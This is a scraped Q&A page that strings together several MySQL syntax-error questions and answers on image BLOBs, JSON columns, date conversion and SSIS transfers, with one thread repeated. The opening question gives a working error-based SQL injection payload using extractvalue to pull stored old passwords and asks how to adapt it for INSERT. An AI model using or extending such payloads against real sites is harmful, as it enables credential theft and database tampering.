I was trying to hack my database and used a method known as error based SQL Injection using extractvalue functions.
I was successful in getting the database tables and columns using the below payload:
crmnotes WHERE id=1 AND extractvalue(0x0a,concat(0x0a,(select concat(oldpasswords) from ofform6_mniterp.entity WHERE userid=0x6d6e69746a6373313534 limit 0,1))) #
Now, I'm unable to use INSERT statement in place of SELECT to insert some data in database using this exploit.
I tried to make many INSERT payloads but each time getting syntax error.
One of the INSERT payload I have used:
crmnotes WHERE id=1 AND extractvalue(0x0a,concat(0x0a,(INSERT INTO ofform6_mniterp.entity(userid) VALUES(0x6d6e69746a6130303031))))
Error Received:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'INTO ofform6_mniterp.entity(userid) VALUES(0x6d6e69746a6130303031))))
Related
Hi,I am new to SQL and I wanted to store images in the database.I already created a column with blob data type and tried to execute the following statement as given here
INSERT INTO `abc`
(`img`)
SELECT
BulkColumn FROM OPENROWSET(
Bulk 'C:\Users\adity\Desktop\New folder\a.png', SINGLE_BLOB) AS BLOB
which gives error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(
Bulk C:\Users\name\Desktop\New folder\a.png, SINGLE_BLOB) AS BLOB' at line 4
I also tried following code as given here
insert into table `abc`(`img`) values('C:\Users\name\Desktop\New folder\an.jpg') where id=1;
which gives the error
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table abc(img) values('C:\Users\adity\Desktop\New folder\an.jpg') where id=1' at line 1
So please suggest me how to store images in a blob without using php,etc and simply using simple sql insert statement.I am using wamp server for my database.
I know that I should use file system for images instead of using database.But what does a file system actually mean.Does it mean a file or image hosting site whose address will be stored in database.
I think that command is a MSSQL syntax. Try this command:
INSERT INTO `abc`
(`img`)
VALUES
(LOAD_FILE('C:/Users/adity/Desktop/New folder/a.png'))
This command stores image as a BLOB
Through Mysql workbench, its very easy to load images into database using the following steps.
Right click on the value of the (blob)column in the table and select "Load value from file".
Then we can provide the image path in the system.
Then it will converted into byte array and stored it automatically.
finally save the changes of the table.
Below works for me,
However, I was able to get it done by moving the image(fileName.jpg) file first in to below folder(in my case) C:\ProgramData\MySQL\MySQL Server 5.7\Uploads and then I executed below command and it works for me,
INSERT INTO `abc`
(`img`)
VALUES
(LOAD_FILE('C:/ProgramData/MySQL/MySQL Server 5.7/Uploads/an.jpg'));
Hope this helps.
I am trying to query for a column with json data in it. I couldn't find any SELECT statement that works for mySQL version 5.6.10.
Let's say we have a table called "dummytable". The column "details" have a json data and I am interested in 2 fields in that json.
{"name": "John", {"school":{"name":"UCLA","id":23113"}}}
I only want to extract "name" and "school name". I tried different mysql statements such as JSON_EXTRACT or details:school:name and none of them works on mysql 5.6.10
One example:
SELECT t.details:name, t.details:school:name
from dummytable t
If I run the query above I get a mysql error because this version of mysql doesn't support it.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':details:name, t.details:school:name
from dummytable t' at line 1
I am trying to insert values into a table:
INSERT INTO EMP VALUES (7876,'ADAMS','CLERK',7788,convert(datetime,'13-JUL-2019',101),1100,NULL,20);
But I receive the error below:
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ''13-JUL-2019',101),1100,NULL,20)' at line 1.
Tried different syntaxes, however I couldn't solve this.
Please some one help.
Thank you.
The convert(datetime,'13-JUL-2019',101) syntax is for MS SQL Server / Sybase.
Instead, use STR_TO_DATE.
Hi,I am new to SQL and I wanted to store images in the database.I already created a column with blob data type and tried to execute the following statement as given here
INSERT INTO `abc`
(`img`)
SELECT
BulkColumn FROM OPENROWSET(
Bulk 'C:\Users\adity\Desktop\New folder\a.png', SINGLE_BLOB) AS BLOB
which gives error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(
Bulk C:\Users\name\Desktop\New folder\a.png, SINGLE_BLOB) AS BLOB' at line 4
I also tried following code as given here
insert into table `abc`(`img`) values('C:\Users\name\Desktop\New folder\an.jpg') where id=1;
which gives the error
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table abc(img) values('C:\Users\adity\Desktop\New folder\an.jpg') where id=1' at line 1
So please suggest me how to store images in a blob without using php,etc and simply using simple sql insert statement.I am using wamp server for my database.
I know that I should use file system for images instead of using database.But what does a file system actually mean.Does it mean a file or image hosting site whose address will be stored in database.
I think that command is a MSSQL syntax. Try this command:
INSERT INTO `abc`
(`img`)
VALUES
(LOAD_FILE('C:/Users/adity/Desktop/New folder/a.png'))
This command stores image as a BLOB
Through Mysql workbench, its very easy to load images into database using the following steps.
Right click on the value of the (blob)column in the table and select "Load value from file".
Then we can provide the image path in the system.
Then it will converted into byte array and stored it automatically.
finally save the changes of the table.
Below works for me,
However, I was able to get it done by moving the image(fileName.jpg) file first in to below folder(in my case) C:\ProgramData\MySQL\MySQL Server 5.7\Uploads and then I executed below command and it works for me,
INSERT INTO `abc`
(`img`)
VALUES
(LOAD_FILE('C:/ProgramData/MySQL/MySQL Server 5.7/Uploads/an.jpg'));
Hope this helps.
I'm not being able to transfer some SQL-MySQL data using SSIS.
I've done the same thing with other packages for different tables but this time I can't.
Here's a screenshot, data is being retrieved absolutely fine from the SQL server.
And here's a shoot if the progress tab.
First error shown in the Progress tab is as follows:
[dest mysql [190]] Error: An exception has occurred during data insertion, the message returned from the provider is:
ERROR [23000] [MySQL][ODBC 3.51 Driver][mysqld-5.6.16]You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '"persona_id", "franqueos", "reiteros", "pcrc_id", "fecha") VALUES (55, 12, 1, 1,' at line 1
I'm not sure on how to approach the situation in order to solve it.
Thank you.
Your MySQL database needs to have the ANSI_QUOTES SQL_MODE option enabled. Or check whether null is allowed on columns, particularity for fecha field in your mysql database table.
Have a look of this as well: Workaround - Writing to a MySQL database from SSIS Bug